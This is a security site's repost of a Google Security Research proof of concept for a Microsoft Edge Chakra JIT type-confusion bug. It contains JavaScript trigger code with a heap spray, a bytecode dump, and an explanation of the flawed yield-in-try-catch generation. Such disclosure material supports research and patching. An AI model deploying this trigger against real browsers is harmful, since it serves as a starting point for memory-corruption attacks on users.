首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Edge Chakra JIT - Parameter Scope Parsing Type Confusion
来源:Google Security Research 作者:Google 发布时间:2018-08-27  
// PoC:
 
async function trigger(a = class b {
    [await 1]() {
    }
}) {
}
 
let spray = [];
for (let i = 0; i < 100000; i++) {
    spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
 
trigger();
 
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
 
Here's the generated bytecode.
 
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
      18 locals (8 temps from R10), 5 inline cache
    Constant Table:
    ======== =====
     R1 LdRoot   
     R2 LdC_A_I4   int:1
     R3 Ld_A       (undefined)
     R4 LdFalse  
    
    Implicit Arg Ins:
    ======== === ===
     R5 ArgIn_A    In1
    
    0000   InitUndecl           R6
    0002   TryCatch             x:004c (  71)
 
 
  Line   1: a = class b {
  Col   24: ^
    0005   BrSrNeq_A            x:0048 (  62)  R5  R3
    000a   NewScFunc            R13 = b()
    000d   InitClass            R13
    0012   ProfiledLdFld        R14 = R13.prototype #0 <0>
    0016   SetHomeObj           R13  R14
    001b   NewScObjectSimple    R9
    001d   ProfiledStFld        R9.value = R2 #1 <1>
    0021   ProfiledStFld        R9.done = R4 #2 <2>
    0025   Yield                R9  R9   <<-----------------------------------------------
    0028   ResumeYield          R15  R9
    002b   NewScFunc            R16 = b.prototype[]()
    002e   SetComputedNameVar   R16  R15
    0033   ProfiledLdFld        R14 = R13.prototype #0 <0>
    0037   InitClassMemberComputedName R14[R15] = R16
    003d   SetHomeObj           R16  R14
    0042   InitConst            R6  R13
    0045   Ld_A                 R5  R13
    0048   Leave              
    0049   Br                   x:0074 (  40)
    004c   Catch                R10
    004e   Nop                
    004f   ProfiledLdRootFld    R11 = root.Promise #4 <4>
    0055   ProfiledLdMethodFld  R12 = R11.reject #3 <3>
    0059   StartCall            ArgCount: 2
    005c   ArgOut_A             Out0 = R11
    005f   ArgOut_A             Out1 = R10
    0062   ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3>  <0>
    006c   Ld_A                 R0  R12
    006f   Leave              
    0070   Br                   x:0076 (   3)
    0073   Leave              
    0074   LdUndef              R0
 
 
  Line   5: }
  Col    1: ^
    0076   Ret             
 
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Edge Chakra JIT - Im
·Microsoft Edge Chakra JIT - 'D
·ADM 3.1.2RHG1 - Remote Code Ex
·Microsoft Edge Chakra JIT - 'I
·CEWE Photoshow 6.3.4 - Denial
·Microsoft Edge Chakra JIT - In
·OpenSSH 2.3 < 7.7 - Username E
·SEIG SCADA System 9 - Remote C
·Mikrotik WinBox 6.42 - Credent
·SEIG Modbus 3.4 - Denial of Se
·Central Management Software 1.
·SEIG Modbus 3.4 - Remote Code
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved